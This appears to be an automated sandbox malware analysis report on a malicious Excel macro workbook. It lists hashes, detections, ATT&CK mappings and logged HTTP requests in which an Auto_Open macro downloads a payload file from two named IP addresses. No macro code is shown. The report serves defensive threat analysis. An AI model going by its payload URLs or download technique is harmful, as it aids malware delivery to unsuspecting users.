Analysis Report 9177284661-04302021.xlsm

Overview

General Information

Sample Name: 9177284661-04302021.xlsm
Analysis ID: 403443
MD5: a8b4e37766d35b543884d8882147eaa2
SHA1: 4356c14118ea9098dabb6d9af620003b7929058a
SHA256: 533c8713c4e10c223a9f8139f9d408ca326aee14a1d88382c91f2ff18cf0f93c
Detection

Hidden Macro 4.0
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Found Excel 4.0 Macro with suspicious formulas
Yara detected MalDoc1
Allocates a big amount of memory (probably used for heap spraying)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6340 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
sheet3.xml | JoeSecurity_MalDoc_1 | Yara detected MalDoc_1 | Joe Security |
sharedStrings.xml | JoeSecurity_MalDoc_1 | Yara detected MalDoc_1 | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview
AV Detection:

Multi AV Scanner detection for domain / URL
Source: http://45.144.31.232/44313,6048108796.dat | Virustotal: Detection: 8%
Multi AV Scanner detection for submitted file
Source: 9177284661-04302021.xlsm | Virustotal: Detection: 38%
Source: 9177284661-04302021.xlsm | ReversingLabs: Detection: 31%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Section loaded: unknown origin: URLDownloadToFileA
Source: excel.exe | Memory has grown: Private usage: 1MB later: 80MB
Source: global traffic | TCP traffic: 192.168.2.6:49720 -> 185.45.193.80:80 (2 occurrences)

Networking:

Yara detected MalDoc1
Source: Yara match | File source: sheet3.xml, type: SAMPLE
Source: Yara match | File source: sharedStrings.xml, type: SAMPLE
Source: global traffic | HTTP traffic detected (2 occurrences):
    GET /44313,6048108796.dat HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 185.45.193.80
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected (2 occurrences):
    GET /44313,6048108796.dat HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 45.144.31.232
    Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 185.45.193.80 (6 occurrences)
Source: unknown | TCP traffic detected without corresponding DNS query: 82.118.21.70 (3 occurrences)
Source: unknown | TCP traffic detected without corresponding DNS query: 45.144.31.232 (6 occurrences)
Source: F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.dr | Strings found in binary or memory:
    http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    http://weather.service.msn.com/data.aspx
    https://addinsinstallation.store.office.com/app/download
    https://addinsinstallation.store.office.com/appinstall/preinstalled
    https://addinslicensing.store.office.com/commerce/query
    https://analysis.windows.net/powerbi/api
    https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    https://api.aadrm.com/
    https://api.addins.omex.office.net/appinfo/query
    https://api.addins.omex.office.net/appstate/query
    https://api.addins.store.office.com/app/query
    https://api.cortana.ai
    https://api.diagnostics.office.com
    https://api.diagnosticssdf.office.com
    https://api.microsoftstream.com/api/
    https://api.office.net
    https://api.onedrive.com
    https://api.powerbi.com/beta/myorg/imports
    https://api.powerbi.com/v1.0/myorg/datasets
    https://api.powerbi.com/v1.0/myorg/groups
    https://apis.live.net/v5.0/
    https://arc.msn.com/v4/api/selection
    https://asgsmsproxyapi.azurewebsites.net/
    https://augloop.office.com
    https://augloop.office.com/v2
    https://autodiscover-s.outlook.com/
    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    https://cdn.entity.
    https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    https://client-office365-tas.msedge.net/ab
    https://clients.config.office.net/
    https://clients.config.office.net/user/v1.0/android/policies
    https://clients.config.office.net/user/v1.0/ios
    https://clients.config.office.net/user/v1.0/mac
    https://clients.config.office.net/user/v1.0/tenantassociationkey
    https://cloudfiles.onenote.com/upload.aspx
    https://config.edge.skype.com
    https://config.edge.skype.com/config/v1/Office
    https://config.edge.skype.com/config/v2/Office
    https://cortana.ai
    https://cortana.ai/api
    https://cr.office.com
    https://dataservice.o365filtering.com
    https://dataservice.o365filtering.com/
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    https://dev.cortana.ai
    https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    https://dev0-api.acompli.net/autodetect
    https://devnull.onenote.com
    https://directory.services.
    https://ecs.office.com/config/v2/Office
    https://entitlement.diagnostics.office.com
    https://entitlement.diagnosticssdf.office.com
    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    https://globaldisco.crm.dynamics.com
    https://graph.ppe.windows.net
    https://graph.ppe.windows.net/
    https://graph.windows.net
    https://graph.windows.net/
    https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    https://hubblecontent.osi.office.net/contentsvc/browse?
    https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    https://incidents.diagnostics.office.com
    https://incidents.diagnosticssdf.office.com
    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    https://insertmedia.bing.office.net/odc/insertmedia
    https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    https://lifecycle.office.com
    https://login.microsoftonline.com/
    https://login.windows-ppe.net/common/oauth2/authorize
    https://login.windows.local
    https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    https://login.windows.net/common/oauth2/authorize
    https://loki.delve.office.com/api/v1/configuration/officewin32/
    https://lookup.onenote.com/lookup/geolocation/v1
    https://management.azure.com
    https://management.azure.com/
    https://messaging.office.com/
    https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    https://ncus.contentsync.
    https://ncus.pagecontentsync.
    https://o365auditrealtimeingestion.manage.office.com
    https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    https://o365diagnosticsppe-web.cloudapp.net
    https://ocos-office365-s2s.msedge.net/ab
    https://ofcrecsvcapi-int.azurewebsites.net/
    https://officeapps.live.com
    https://officeci.azurewebsites.net/api/
    https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    https://officesetup.getmicrosoftkey.com
    https://ogma.osi.office.net/TradukoApi/api/v1.0/
    https://omex.cdn.office.net/addinclassifier/officeentities
    https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    https://onedrive.live.com
    https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    https://onedrive.live.com/embed?
    https://outlook.office.com/
    https://outlook.office.com/autosuggest/api/v1/init?cvid=
    https://outlook.office365.com/
    https://outlook.office365.com/api/v1.0/me/Activities
    https://outlook.office365.com/autodiscover/autodiscover.json
    https://ovisualuiapp.azurewebsites.net/pbiagave/
    https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    https://portal.office.com/account/?ref=ClientMeControl
    https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    https://powerlift-frontdesk.acompli.net
    https://powerlift.acompli.net
    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    https://prod-global-autodetect.acompli.net/autodetect
    https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    https://res.getmicrosoftkey.com/api/redemptionevents
    https://rpsticket.partnerservices.getmicrosoftkey.com
    https://settings.outlook.com
    https://shell.suite.office.com:1443
    https://skyapi.live.net/Activity/
    https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    https://staging.cortana.ai
    https://storage.live.com/clientlogs/uploadlocation
    https://store.office.cn/addinstemplate
    https://store.office.com/?productgroup=Outlook
    https://store.office.com/addinstemplate
    https://store.office.de/addinstemplate
    https://store.officeppe.com/addinstemplate
    https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    https://tasks.office.com
    https://templatelogging.office.com/client/log
    https://uci.cdn.office.net/mirrored/smartlookup/current/
    https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    https://visio.uservoice.com/forums/368202-visio-on-devices
    https://web.microsoftstream.com/video/
    https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    https://webshell.suite.office.com
    https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    https://wus2.contentsync.
    https://wus2.pagecontentsync.
    https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    https://www.odwebp.svc.ms

System Summary:

Found malicious Excel 4.0 Macro
Source: 9177284661-04302021.xlsm | Initial sample: urlmon
Document contains an embedded VBA macro which may execute processes
Source: VBA code instrumentation | OLE, VBA macro: Module Byutut, Function Auto_Open, API Microsoft Excel:Application.Run(:Range) | Name: Auto_Open
Found Excel 4.0 Macro with suspicious formulas
Source: 9177284661-04302021.xlsm | Initial sample: EXEC
Source: 9177284661-04302021.xlsm | OLE, VBA macro line: Public Function Auto_Open()
Source: VBA code instrumentation | OLE, VBA macro: Module Byutut, Function Auto_Open | Name: Auto_Open
Source: 9177284661-04302021.xlsm | OLE indicator, VBA macros: true
Source: classification engine | Classification label: mal80.troj.expl.evad.winXLSM@1/8@0/3
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{F612D367-30B3-4645-A2BE-D0BDDD421362} - OProcSessId.dat
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: 9177284661-04302021.xlsm | Virustotal: Detection: 38%
Source: 9177284661-04302021.xlsm | ReversingLabs: Detection: 31%
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: 9177284661-04302021.xlsm | Initial sample: OLE zip file path = xl/media/image1.jpg
Source: 9177284661-04302021.xlsm | Initial sample: OLE zip file path = xl/drawings/drawing2.xml
Source: 9177284661-04302021.xlsm | Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: 9177284661-04302021.xlsm | Initial sample: OLE zip file path = xl/drawings/_rels/drawing2.xml.rels
Source: 9177284661-04302021.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial Access: Valid Accounts; Default Accounts; Domain Accounts
Execution: Scripting32; Exploitation for Client Execution12; At (Linux)
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows)
Privilege Escalation: Extra Window Memory Injection1; Boot or Logon Initialization Scripts; Logon Script (Windows)
Defense Evasion: Masquerading1; Scripting32; Extra Window Memory Injection1
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager
Discovery: File and Directory Discovery1; System Information Discovery1; Query Registry
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration
Command and Control: Non-Application Layer Protocol1; Application Layer Protocol11; Ingress Tool Transfer1
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data

      Behavior Graph

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

Source | Detection | Scanner | Label
9177284661-04302021.xlsm | 39% | Virustotal |
9177284661-04302021.xlsm | 32% | ReversingLabs | Document-Office.Trojan.Valyria

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

Source | Detection | Scanner | Label
https://cdn.entity. | 0% | URL Reputation | safe
https://powerlift.acompli.net | 0% | URL Reputation | safe
https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe
https://cortana.ai | 0% | URL Reputation | safe
https://api.aadrm.com/ | 0% | URL Reputation | safe
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | Virustotal |
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | Avira URL Cloud | safe
http://45.144.31.232/44313,6048108796.dat | 8% | Virustotal |
http://45.144.31.232/44313,6048108796.dat | 0% | Avira URL Cloud | safe
https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe
https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe
https://officeci.azurewebsites.net/api/ | 0% | Virustotal |
https://officeci.azurewebsites.net/api/ | 0% | Avira URL Cloud | safe
https://store.office.cn/addinstemplate | 0% | URL Reputation | safe
https://store.officeppe.com/addinstemplate | 0% | URL Reputation | safe
https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe
https://www.odwebp.svc.ms | 0% | URL Reputation | safe
https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe
https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe
https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe
https://ncus.contentsync. | 0% | URL Reputation | safe
https://apis.live.net/v5.0/ | 0% | URL Reputation | safe
https://wus2.contentsync. | 0% | URL Reputation | safe
https://asgsmsproxyapi.azurewebsites.net/ | 0% | Virustotal |
https://asgsmsproxyapi.azurewebsites.net/ | 0% | Avira URL Cloud | safe
http://185.45.193.80/44313,6048108796.dat | 0% | Avira URL Cloud | safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 0% | URL Reputation | safe
https://ncus.pagecontentsync. | 0% | URL Reputation | safe
https://skyapi.live.net/Activity/ | 0% | URL Reputation | safe
https://dataservice.o365filtering.com | 0% | URL Reputation | safe
https://api.cortana.ai | 0% | URL Reputation | safe
https://ovisualuiapp.azurewebsites.net/pbiagave/ | 0% | Avira URL Cloud | safe
https://directory.services. | 0% | URL Reputation | safe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://45.144.31.232/44313,6048108796.dat | true | Virustotal: 8%; Avira URL Cloud: safe | unknown
http://185.45.193.80/44313,6048108796.dat | false | Avira URL Cloud: safe | unknown

      URLs from Memory and Binaries

                                                                                                        https://asgsmsproxyapi.azurewebsites.net/F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                        • 0%, Virustotal, Browse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://clients.config.office.net/user/v1.0/android/policiesF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                          high
                                                                                                          https://entitlement.diagnostics.office.comF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                            high
                                                                                                            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                              high
                                                                                                              https://outlook.office.com/F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                high
                                                                                                                https://storage.live.com/clientlogs/uploadlocationF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                  high
                                                                                                                  https://templatelogging.office.com/client/logF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                    high
                                                                                                                    https://outlook.office365.com/F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                      high
                                                                                                                      https://webshell.suite.office.comF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                        high
                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                          high
                                                                                                                          https://management.azure.com/F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                            high
                                                                                                                            https://login.windows.net/common/oauth2/authorizeF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                              high
                                                                                                                              https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://graph.windows.net/F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                high
                                                                                                                                https://api.powerbi.com/beta/myorg/importsF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://devnull.onenote.comF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://ncus.pagecontentsync.F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://messaging.office.com/F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://augloop.office.com/v2F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://skyapi.live.net/Activity/F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://clients.config.office.net/user/v1.0/macF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://dataservice.o365filtering.comF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://api.cortana.aiF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://onedrive.live.comF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://ovisualuiapp.azurewebsites.net/pbiagave/F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://visio.uservoice.com/forums/368202-visio-on-devicesF19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://directory.services.F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40.0.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown

Contacted IPs


Public

IP             Domain   Country               ASN     ASN Name                        Malicious
82.118.21.70   unknown  Ukraine               204957  GREENFLOID-ASUA                 false
45.144.31.232  unknown  United Kingdom        42994   HQservCommunicationSolutionsIL  false
185.45.193.80  unknown  United Arab Emirates  60117   HSAE                            false

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 403443
Start date: 04.05.2021
Start time: 06:01:34
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 4m 38s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 9177284661-04302021.xlsm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal80.troj.expl.evad.winXLSM@1/8@0/3
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsm
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match          Associated Sample Name / URL  Detection  Context
45.144.31.232  9177284661-04302021.xlsm      malicious  45.144.31.232/44313,6048108796.dat
185.45.193.80  9177284661-04302021.xlsm      malicious  185.45.193.80/44313,6048108796.dat

Domains

No context

ASN

Match  Associated Sample Name / URL  Detection  Context
                                                                                                                                                    Contract_372758654-1.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 195.123.244.129
                                                                                                                                                    apr.21.A.31573147172-04202021.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 82.118.23.186
                                                                                                                                                    HQservCommunicationSolutionsIL9177284661-04302021.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.31.232
                                                                                                                                                    73827110_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.30.80
                                                                                                                                                    73827110_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.30.80
                                                                                                                                                    73827110_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.30.80
                                                                                                                                                    d658fc2e_by_Libranalysis.docmGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.29.166
                                                                                                                                                    d658fc2e_by_Libranalysis.docmGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.29.166
                                                                                                                                                    d658fc2e_by_Libranalysis.docmGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.29.166
                                                                                                                                                    figure-04.26.2021.docGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.29.200
                                                                                                                                                    figure-04.26.2021.docGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.29.200
                                                                                                                                                    figure-04.26.2021.docGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.29.200
                                                                                                                                                    Anfrage-04.14.2021.docGet hashmaliciousBrowse
                                                                                                                                                    • 91.194.11.70
                                                                                                                                                    Anfrage-04.14.2021.docGet hashmaliciousBrowse
                                                                                                                                                    • 91.194.11.70
                                                                                                                                                    Anfrage-04.14.2021.docGet hashmaliciousBrowse
                                                                                                                                                    • 91.194.11.70
                                                                                                                                                    CompensationClaim-1416897608-04152021.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.30.16
                                                                                                                                                    CompensationClaim-1416897608-04152021.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.30.16
                                                                                                                                                    Suspect.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.30.106
                                                                                                                                                    Compensation_690949256_04132021.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.30.106
                                                                                                                                                    Suspect.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.30.106
                                                                                                                                                    Compensation_690949256_04132021.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.30.106
                                                                                                                                                    malw.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 45.144.30.106

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\F19E34F0-F5C8-43C4-A6F2-C9BCDF4F2C40
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 134558
Entropy (8bit): 5.368373000591703
Encrypted: false
SSDEEP: 1536:zcQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:AEQ9DQW+zPXO8
MD5: 7943F9F555A0A5B35484924AB84AE27D
SHA1: CBD7599EF713FFE16C6FA5BB1E14736E677269CA
SHA-256: 50F4E95050F712083129FCCF8E09E7F0B673D6AA09B6B26BF8813125D8D6F280
SHA-512: 0CB69B6519A829BF5418E607EF05D13BDF632F97D71530FCF7FB046C1B448CBF7E3AC05E7219EDB6D8C0538240215BC36C0C74DA4F9695635B755046A7A202C1
Malicious: false
Reputation: low
